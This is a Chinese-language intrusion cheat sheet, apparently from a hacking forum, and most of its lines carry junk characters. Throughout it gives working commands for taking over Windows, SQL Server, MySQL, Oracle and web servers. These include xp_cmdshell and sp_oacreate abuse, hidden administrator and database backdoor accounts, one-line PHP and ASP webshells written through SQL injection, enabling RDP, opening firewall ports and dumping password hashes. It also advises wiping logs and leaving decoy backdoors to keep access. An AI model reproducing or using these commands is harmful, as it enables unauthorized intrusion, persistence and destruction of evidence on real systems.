* ?7 _; f% @6 F, {0 m! a1.net user administrator /passwordreq:no
/ k& ?: X# P' |+ s# e6 ]0 `这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了! x6 n, a( {* r" o4 D& s6 Z! ]
2.比较巧妙的建克隆号的步骤0 J( s/ E7 [; y" c
先建一个user的用户
+ F9 Z# _5 S; ~/ i( @6 X然后导出注册表。然后在计算机管理里删掉
8 B5 O6 u- o: l: f在导入,在添加为管理员组
?3 m- S: z: q5 B+ B1 g6 c( R3.查radmin密码. q5 |( r, Z" [% S5 S
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
: V# d5 c( h0 x8 t' f( V4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
' C9 }0 ~# ?# K# K6 \. ], K建立一个"services.exe"的项) z& E" g) a# k* R
再在其下面建立(字符串值)
+ u" Z9 l1 |+ ^% s2 c2 n: \. W键值为mu ma的全路径
( V# a) K8 l) n$ d a2 _5.runas /user:guest cmd8 _9 a/ ~- I0 Z* h8 F! K9 D4 r
测试用户权限!2 v# s. y4 E9 P
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?% Z- Z3 M; S3 @
7.入侵后漏洞修补、痕迹清理,后门置放:
" }/ I9 Q% ~8 \& p' {基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
: k4 o' T. ?/ G/ R8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
/ _3 I5 p' M+ M. y6 p& n6 z
7 f8 l5 N9 \! H% Y* S3 ^$ O9 q; cfor example
& \& x) ^+ A( E6 C }& { G0 N+ Q% ^' v$ |; W" y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
~% O- r: g3 H$ V) Q+ P2 l" Z5 q, k3 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add') U, g# V3 C; y7 j/ B
' l( l, u. l1 X$ ], _! F: e9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
- t+ _/ i6 u' i' t* o; z' j如果要启用的话就必须把他加到高级用户模式4 m6 j% _1 W* A1 z8 x4 s* W/ b
可以直接在注入点那里直接注入+ [+ e g( W: G$ ?' `1 v
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--. G) p' c5 @4 A- C: ~: q3 F( Z; h
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--5 S6 @; R- f# g7 R" \$ o0 W# o, u
或者9 _9 c: P L/ b/ V3 i3 }1 u/ W* A# X
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
4 r) X7 W* u0 w8 ~0 G9 ^/ o来恢复cmdshell。) S1 i3 K- Z! p/ |+ @( E
: t/ ]; J( p2 w8 _& z
分析器
* M* Q0 G) q" ?( l: eEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--- t9 w8 Q8 t8 k: g
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")6 Y0 ?' ~/ l, r( p5 n
10.xp_cmdshell新的恢复办法
' B& M2 H3 g& D4 v. vxp_cmdshell新的恢复办法
8 h- r( X: Z% M3 A扩展储存过程被删除以后可以有很简单的办法恢复:$ a: M6 r/ K% l& @2 X
删除
# w( h) x. u' W7 Ydrop procedure sp_addextendedproc$ _' D" k g% z. q2 A6 e% n
drop procedure sp_oacreate: ~9 G" Z0 o. |+ e% B6 f
exec sp_dropextendedproc 'xp_cmdshell'
* ^& B3 o( W$ ]# W, c( ]0 W
( g) e( u- @% m, s3 B恢复
6 v0 {7 r( e5 h" I* t5 z9 Rdbcc addextendedproc ("sp_oacreate","odsole70.dll")- @4 X6 K$ J9 l J! _
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
" l. d% F- k, x; G- \' ^' w* A0 D% z
7 Z- ~6 o$ d% F+ ]7 a6 |. o* l这样可以直接恢复,不用去管sp_addextendedproc是不是存在
- `4 ~6 {6 k6 \9 e9 K5 O+ j; M+ F* g; Y1 s
-----------------------------
9 A; c- f5 A0 }* h6 Z5 t
" ~; t& G3 F& e F6 r; ]2 q删除扩展存储过过程xp_cmdshell的语句:' z4 M1 P d: _( P2 W
exec sp_dropextendedproc 'xp_cmdshell'
# l+ d. K+ u, d2 @7 |4 k$ N1 X+ b( ~, I& V
恢复cmdshell的sql语句
. h' z# p) |5 {7 H8 b; \$ @& ?exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
- R5 v" G) B) f" w% {3 C; s
. ?: c) z: ?% o+ m) r$ Z
- q' y5 Q: Z9 z2 V开启cmdshell的sql语句0 g* n$ ~" k* l/ V& v
* T" B( I/ f. C
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" j. E0 l9 b1 V" W3 {' w- B
; f j# l0 S" m0 g
判断存储扩展是否存在
" n2 h7 f. E# w* D3 R4 hselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. [) |" @/ P/ V! y- ]; W返回结果为1就ok
1 ~& G9 r' G1 g8 Z+ c+ {
# X& x3 J* [4 i恢复xp_cmdshell# s5 W- Y$ t/ _3 ?
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# G9 v2 Z- L" v0 Y' I) I
返回结果为1就ok. m9 |/ z! g0 [0 [- G
# l% _, f( A4 b0 J; L! Z
否则上传xplog7.0.dll
1 Q( x; {! H* ^4 t8 B: J& [' n3 Vexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
5 a- w/ p* @' G# x3 |* [9 i
6 X5 R) }, I/ M* R: D堵上cmdshell的sql语句 w5 Q% L) [% e) y% X8 k \
sp_dropextendedproc "xp_cmdshel
e+ z' r; b3 T: w& W) ?7 g-------------------------
* o" x& l$ S. K' n/ A清除3389的登录记录用一条系统自带的命令:
0 r1 h% v8 E6 }( Wreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
% e7 g# V% L: s+ g8 w# v4 B/ r$ d4 ?) I- ~! r9 J. h
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
# w4 j; q t6 w: N; N9 |在 mysql里查看当前用户的权限$ I* ?' |* k) t" T" U$ V
show grants for 7 g% K# c" A1 Y& L0 E2 K
* S' `: P0 p1 I9 a& o以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
# G" s/ w8 e: X
5 d/ f1 a6 g% B0 T6 U- N2 V
/ G7 b4 _) i+ R# L$ NCreate USER 'itpro'@'%' IDENTIFIED BY '123';
( h- X# q. ~- C9 T
9 t: f' h2 M1 TGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
* w9 \ }# v4 A* L. r* `2 W, l3 r- a* @: T d2 Y
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
" w: K, G5 Z3 Z' m3 W& P' v" Y5 ?& ^* Q% }3 q/ m* L
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;! k3 U" C7 d: g) s) Q
E& S+ @3 K8 N5 V
搞完事记得删除脚印哟。7 f' v2 I5 c) Q: x
/ L7 Q& E( N5 e% z
Drop USER 'itpro'@'%';; B: o% D7 U4 @- ?5 M }
2 Z4 [% f. J8 Z! o2 uDrop DATABASE IF EXISTS `itpro` ;
0 |+ L9 z9 {, p- ]! w; w+ V) R- ^8 c2 z% ?; I I
当前用户获取system权限" F3 ?& l7 }( q' q# F, t/ d
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
$ ^/ m+ l W( g$ v% ~sc start SuperCMD- g- p5 M3 R9 ^( O: a8 [
程序代码5 i7 a& G& u8 X: T9 z' P) o
<SCRIPT LANGUAGE="VBScript">
9 t7 B- @- ~! ], H& \$ Iset wsnetwork=CreateObject("WSCRIPT.NETWORK")
' i$ t$ C: W( _5 E9 {os="WinNT://"&wsnetwork.ComputerName8 L/ Z1 c3 R; x3 K
Set ob=GetObject(os)- O9 H7 Q& A$ M7 j
Set oe=GetObject(os&"/Administrators,group")) ~0 e- C7 j* w- S ^. e r$ R
Set od=ob.Create("user","nosec"). l; g! [" a8 N+ ~
od.SetPassword "123456abc!@#"8 {! s! o6 Q+ z
od.SetInfo/ O* \6 L |3 H( R7 _# d* |2 G- L7 h
Set of=GetObject(os&"/nosec",user)
+ |2 O K: \# A( |2 Z; U$ O$ Goe.add os&"/nosec"0 K4 O& i" J# z# i2 M7 F! a! h
</Script>7 m% n& f9 ^& _5 n$ F
<script language=javascript>window.close();</script>! n5 q9 F7 O+ `& @6 H
: l x' y, P# A6 |$ q' K
7 Y$ ^8 [2 Z `/ d7 Q6 Y& I, c; w# s! u. [+ ^! ^- ], n& o1 c& H
4 ]/ I { O' z% U5 x突破验证码限制入后台拿shell) m9 `2 s: f, Z- F8 q) ?0 {
程序代码. [+ H8 e5 D8 G( W5 }
REGEDIT4
% f( m: X7 _0 U! w7 A[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
$ t- u, F- ~) [ n8 {& B: {8 W1 t' P# |"BlockXBM"=dword:00000000
7 `1 c7 S4 `- V
2 V2 {: b6 x. p; U9 T& A保存为code.reg,导入注册表,重器IE) R% U* d& m# Z4 X
就可以了! f P, o. p3 c' X8 |
union写马
+ ?: u3 ?" i b' F程序代码8 X7 C0 v, ^$ W
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*# k! ?3 W) E# z# ]/ b! U
9 n2 v$ |( P9 V3 v3 p: p4 `/ j
应用在dedecms注射漏洞上,无后台写马
& N- |- K. O1 M! |' ^: W5 ~# }; M5 o6 Gdedecms后台,无文件管理器,没有outfile权限的时候1 y; O8 X {* y. W# u
在插件管理-病毒扫描里8 ~$ ]5 X$ Z/ w: p9 @
写一句话进include/config_hand.php里# M- m0 Y1 ]7 U! X }) k( t# U0 {
程序代码; P; o4 D ]/ L# g6 k$ Z, f
>';?><?php @eval($_POST[cmd]);?>
5 R2 _3 U4 h6 S' `2 G" z6 o( D7 A; p/ G2 a; E# c+ N
/ i7 |# }- t( }; S
如上格式* r9 ]' g9 j9 ]2 Y+ {
- M% Y F* A: L6 b3 w3 S) e1 yoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解% W1 k- m4 ~4 q& n0 u- `, y
程序代码
5 L# A3 A+ r4 k) j6 L: uselect username,password from dba_users;
4 `5 B7 G9 L1 A7 i3 m) N) u, o* {. T" m
; |* s0 o' u6 R' j+ d! `5 Qmysql远程连接用户
7 v% I" Z5 h" g( U; r' V程序代码$ ^. Q, p! R6 r
+ T! X. M: ]. J
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
8 e* L# n! }- [8 R3 {* d) pGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
( S0 Q- U: l. M% t. G1 f# n8 JMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 02 Y' G6 Y0 y3 n0 E2 e" M# |
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;8 `* H8 G& f& B
/ {3 r: a( A& M- e
4 i: {/ A* S4 y) Y
; y" z' H( D/ j3 k0 U: Q- H7 c9 b8 f! w# ~5 g8 i7 K, P
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
) l9 K" M5 N: ^) W6 a% E- B! f5 v
1.查询终端端口$ g/ \) b, c8 b& q
, }9 R* U( x4 d ~8 V/ X4 g
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
9 w% S5 v. y ?1 b4 q# R6 O. Q+ y
& G# U5 \7 n2 p- k通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"$ N3 L( b9 s8 \! `+ m
type tsp.reg
- I) o! K$ \4 U" g: G D- u( s' S
- V+ J# H+ c4 V/ t: _2.开启XP&2003终端服务, E0 _& P- m( r) A; A2 E( G
) [1 Z5 N9 m( Y' l1 J3 j* M3 L4 |
. b8 b0 V+ |* u$ a2 O6 jREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
( a7 Z; b4 z; p
# w: Z/ o a+ ~0 Q0 Y" v
9 I) C6 G/ R! R9 ?5 R7 O, g/ KREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' U9 t; C, `, X0 T
: v- H' o4 ?! K. a4 d3 p. |. U6 R3.更改终端端口为20008(0x4E28)
* [+ c, B R5 G# O0 ]& m, u6 z7 b/ H# z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
H4 y+ u2 Z: q; O
r& D3 a, Y. Z1 QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f1 [- k/ t7 v& n/ H) g# A2 M/ G3 g
" B% F: z( |/ c8 o. I
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
. d) a2 H, {# U1 ^
5 I# S7 x6 z: b/ ^3 Q% [9 ZREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
0 E }; `' Q: ?0 K1 }( T$ t6 `4 m6 w: W5 `3 T* V# z9 f9 h. ~0 ~
. W! Y+ f* e+ i
5.开启Win2000的终端,端口为3389(需重启)3 x7 X" @9 l! V1 m, P3 s
8 O7 I6 b( C: F9 techo Windows Registry Editor Version 5.00 >2000.reg
; F1 B0 p1 i. b6 c1 E I+ ]echo. >>2000.reg
. g: v: N$ f7 Q A2 s$ Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ) ]# i8 `6 O9 @# |, B3 @- o. V% t; t/ [
echo "Enabled"="0" >>2000.reg & q3 y+ T6 u s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
+ L# E, N1 _) V. q* pecho "ShutdownWithoutLogon"="0" >>2000.reg 0 F# @3 m( w5 V3 j; i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 4 S+ T' P+ i; M8 x6 K3 |: n
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 2 Z4 G" W) ?2 x3 u3 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 3 a3 w' G" Y, f7 w% P5 u0 D6 H
echo "TSEnabled"=dword:00000001 >>2000.reg
' B" K% [7 a! ]# t+ M9 x# d$ w3 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ! J" C1 [( c" z) M+ H
echo "Start"=dword:00000002 >>2000.reg
5 C4 c5 o: f: recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
7 V4 }% s7 n1 N+ ?$ X' Uecho "Start"=dword:00000002 >>2000.reg ; b5 J' | m0 }. y, I2 n' G Q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg . D2 e& l. c( c. {3 r; I
echo "Hotkey"="1" >>2000.reg
6 K/ K0 x! R* R2 {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
2 H- e4 m( b' V2 M6 necho "ortNumber"=dword:00000D3D >>2000.reg 6 M& l# |" \9 H& ~- E N9 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
- [ J0 j/ n( P6 @" q1 recho "ortNumber"=dword:00000D3D >>2000.reg
4 ~& r) u& P9 C2 E5 H& R5 w. p, h* o: K. x7 h# M O* G
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启) o# d# S5 S: I7 g2 X' n% x* a
/ X/ Z+ y& }- g/ I9 k) C@ECHO OFF & cd/d %temp% & echo [version] > restart.inf+ K6 k$ J8 R0 n W
(set inf=InstallHinfSection DefaultInstall)
; k: \9 C/ ?7 B0 Vecho signature=$chicago$ >> restart.inf
9 ^& A" k5 o! u5 k/ Gecho [defaultinstall] >> restart.inf
. d: a9 D2 O, }" X7 h, arundll32 setupapi,%inf% 1 %temp%\restart.inf7 _9 o/ v& F$ n- w2 ?( v( z) K: }: X
2 s5 D! `' e8 \* G9 I, y
/ g( h/ c$ V1 w9 H5 I3 x) ~7.禁用TCP/IP端口筛选 (需重启)
% `5 B5 g# v* N( ] V2 [. T& i' |
; ~- G& w3 j0 Y4 x6 R( LREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f( U5 N, R" f. u
. {6 p5 [$ \9 {" G1 Z* d
8.终端超出最大连接数时可用下面的命令来连接2 `4 t) t ~8 i# u& F; m; z9 I& z; I9 @
( h v/ T! D$ x) n1 J1 S& hmstsc /v:ip:3389 /console' T7 }/ H1 F( g) I$ F- `% k" d
2 z% Y. y" [% y C' x5 v6 f9.调整NTFS分区权限8 k- J. }% _7 `* p0 y/ k6 N' Q* |7 q
( E" k+ k: |! r1 v
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利), t+ ~ X* [$ q& Y' l
! C5 z* E( ]" ocacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)# }9 M7 c. y) R) d- s* u( u2 |
# v+ b6 U' R; f' W# G* V& H------------------------------------------------------( d( Q- g$ \6 t
3389.vbs ' j3 m) \# l4 r
On Error Resume Next; E9 D: m9 g* u' D+ U& F- x6 H1 o
const HKEY_LOCAL_MACHINE = &H800000020 K ^2 S2 i9 ?$ F) G% V* F6 \6 j" }5 T
strComputer = "."
8 Q9 X1 L4 A* g P- WSet StdOut = WScript.StdOut. P6 Z, ~( O6 x/ Q) B1 Y |
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_2 m: P$ n* Y. J+ o2 s* o8 L
strComputer & "\root\default:StdRegProv")$ z5 ~4 ~8 Z( {5 v5 L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
1 `) P( F3 ]; c- J( _! b- W; {oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
/ ?6 [: ]! v. fstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"% F- Z! P/ Y4 C5 |3 ^ S
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
/ L- }4 k( i4 U/ HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp": H/ A- |7 U+ y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
# @7 v2 U% g# H, b: P1 H' Z \strValueName = "fDenyTSConnections"% G1 g7 m/ l# q, m2 x9 y1 A7 F
dwValue = 0# Q! l+ d: j2 ~& b5 D
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue! l9 X: T- c( P1 }# Z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
+ Q. c5 G: e! K4 ]0 `strValueName = "ortNumber"6 k3 t' P# l* b: _; e% Q
dwValue = 3389. u' x6 X' N- J. S* Y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue g( b1 Y# y b
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
& L. ?( V) H6 H! M. R& `/ YstrValueName = "ortNumber"
2 B3 @" a" n+ [dwValue = 33894 }; U1 S& ` o& B
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue( S- x9 V! ]% R" ^- C! i. v+ w
Set R = CreateObject("WScript.Shell") 8 @% Z' Y6 q* l7 {* k) \8 Q/ l
R.run("Shutdown.exe -f -r -t 0")
# @# E1 T* g, G' t
& g* O7 p2 }" j, l删除awgina.dll的注册表键值
* v: z3 `6 g8 a2 ?2 z* Y6 c程序代码
5 e# D9 ]: X# O: b4 N
9 Y1 g1 I o6 Jreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f# B% u; b1 K& ^# L* y3 z; Z+ F
% c" w: {( P' M2 Y4 W+ @5 O
& o: F3 {& z5 f9 C
- a5 k, l- H3 c5 Z1 b! x2 } {) L/ O
程序代码
# |! T5 Q! O8 R' f" @HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
9 w/ {5 g0 D/ o3 b$ E1 J6 j9 G% {9 O* m! `% [! W- L
设置为1,关闭LM Hash
. V3 y W. g0 W5 U; e: j7 ]% k7 g8 B; v! Y9 i
数据库安全:入侵Oracle数据库常用操作命令; N! T1 \1 p) v m( D
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。& _ r' Z- f5 p! d
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。; `/ Y' r6 e0 l) {8 B
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; E: t! N: V; f
3、SQL>connect / as sysdba ;(as sysoper)或
+ l; k: L4 L* _& ~0 \4 i" m# ^connect internal/oracle AS SYSDBA ;(scott/tiger)8 D7 F5 P# A& W, k+ q9 z t
conn sys/change_on_install as sysdba;4 A( \/ ~; p' f- h
4、SQL>startup; 启动数据库实例
5 R7 m8 c' O8 O( @# B5、查看当前的所有数据库: select * from v$database;
( V D( M) N- h: k, E: }# eselect name from v$database;
3 a: [. ^. s) F O p+ K* g6、desc v$databases; 查看数据库结构字段
8 N7 d/ _! V) }# V3 D: Q7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
- y/ {2 p& d, W8 F! _) E2 I6 k3 {SQL>select * from V_$PWFILE_USERS;, V* ~7 d" {' ?8 a3 a. R( c
Show user;查看当前数据库连接用户
7 k( u7 h) K5 B9 l0 A; r3 t( e4 [8、进入test数据库:database test;, }. n% t- [+ I3 O8 ]6 l" x
9、查看所有的数据库实例:select * from v$instance;8 N' y- y" {1 m) n% O5 q% V- Z
如:ora9i
9 c+ w# }6 E8 W/ m0 [; h10、查看当前库的所有数据表:( P2 c- Q+ d5 o2 w# @5 u/ S# M* E" @
SQL> select TABLE_NAME from all_tables;0 M1 r; r8 P; q$ K, W# d! m! E
select * from all_tables;( k4 R6 J! R$ I) V+ I
SQL> select table_name from all_tables where table_name like '%u%'; B: d1 e( R; ?3 s. _/ s
TABLE_NAME
% a$ C \( Y+ r0 ^; X$ c$ P------------------------------5 ~( v* d' j D, H
_default_auditing_options_3 s# J) e) X" ]5 a9 i
11、查看表结构:desc all_tables;
) w% ~, o/ G- M1 B' ?" X# v/ [12、显示CQI.T_BBS_XUSER的所有字段结构:- d5 b5 ?+ d% y. O
desc CQI.T_BBS_XUSER;- H, d' f" i4 ~) \2 g+ P
13、获得CQI.T_BBS_XUSER表中的记录:. ~' t; F" u7 P$ t: u$ h, a6 l( C
select * from CQI.T_BBS_XUSER;) J4 H2 U" b: z0 _9 E. i0 _
14、增加数据库用户:(test11/test). N) W! m& Y, ~
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;7 Y C& D5 ]* n
15、用户授权:
" k5 Q y8 q& qgrant connect,resource,dba to test11; @4 I: S2 }0 ~8 V, p2 W
grant sysdba to test11;! W- H' t& G0 I: e+ y1 _
commit;
( ^* f0 s' v. {8 Y. |- A$ t16、更改数据库用户的密码:(将sys与system的密码改为test.)
8 p6 L. o7 ~* V7 R# ^alter user sys indentified by test;+ L: y; S1 `/ W: |
alter user system indentified by test;5 v0 S r E) R; \! g) M
; N% D! z# y; Q! b5 M# ? F9 F" b
applicationContext-util.xml- n* ~4 Q$ D& s6 P0 f/ h. s
applicationContext.xml2 q0 }3 e) C* K: n+ `8 e
struts-config.xml5 U6 d+ a$ M7 R- I3 A r% h) a! P% U
web.xml; H, Y0 r l# o
server.xml# m/ U5 x* c+ a. e
tomcat-users.xml- F4 r$ w8 {- L* ^
hibernate.cfg.xml2 E# \( a; L6 U' W1 E
database_pool_config.xml
4 @8 C2 m. U$ l( F' X& `: u' i6 o+ W; @( b* [, f
9 A$ L5 j6 X# K4 S3 j2 p* e
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
) z, y7 }2 V( a\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini! i8 A$ \1 U$ G6 J' D
\WEB-INF\struts-config.xml 文件目录结构" l$ t. i. E! ~6 ~, Z% q9 p
/ ~7 N, r- i0 g: l, `
spring.properties 里边包含hibernate.cfg.xml的名称
# c, S8 z: V) @% r B* j1 ^6 I) H8 l' `, {3 k( R
- l- H" [9 R$ A) h7 H% w- k0 W- aC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
: q* N1 ^& `$ }2 \% B! r( k5 S. R% q) M' \& S
如果都找不到 那就看看class文件吧。。
- T1 d& D3 ^, M; i; x+ Q, i1 r. D
' g8 q+ u" \* X+ D* S测试1:7 O, e& F( U6 T7 B% m, G" d3 _0 P6 m
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
9 a5 j/ Z/ q# d- q& |8 k4 i: X
) d# U0 e0 M. u7 A* y测试2:0 e( r6 A- `( S' x" q' {
, i! p# Q g# b+ n/ \
create table dirs(paths varchar(100),paths1 varchar(100), id int); B0 Y( J: I; `# a' d1 C
- N& M# ~$ A' K P7 u9 ?
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--5 b/ {3 D$ a: e* e4 O
! H" H# U, o5 l# e, i' `( Y3 {5 e
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t12 W- j4 l6 q/ X
# { _9 s1 H! V查看虚拟机中的共享文件:
+ o7 O g$ I7 o) v8 u6 W7 L在虚拟机中的cmd中执行, P Q# s5 E: k! V$ H2 T4 y
\\.host\Shared Folders* I3 C0 `3 @0 v& h e6 D8 s; t1 d5 p
# V$ ~( }7 u" \0 K" u3 Bcmdshell下找终端的技巧
! H2 o' z9 p# f" I% z6 u/ h4 e, i找终端:
* g7 k* _& K- L8 o; x第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
% v) w. {4 e/ D! }" X1 z 而终端所对应的服务名为:TermService
" _* {0 t1 z6 u9 k- f! E第二步:用netstat -ano命令,列出所有端口对应的PID值! ' j4 y6 O1 U2 }2 ?7 x* @; O
找到PID值所对应的端口
5 G2 F) V3 r" o& `# Y
$ n6 H" r* W7 ]3 ]7 @查询sql server 2005中的密码hash
, P k- O% U S+ A3 B8 o. K& HSELECT password_hash FROM sys.sql_logins where name='sa'
2 k \8 Y# G6 a3 y+ c# S6 @+ _SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a" r: ~2 G( }" D; ~% e1 `
access中导出shell. |% g" H* M3 ~5 q, I
4 t- X; k9 V& N2 l
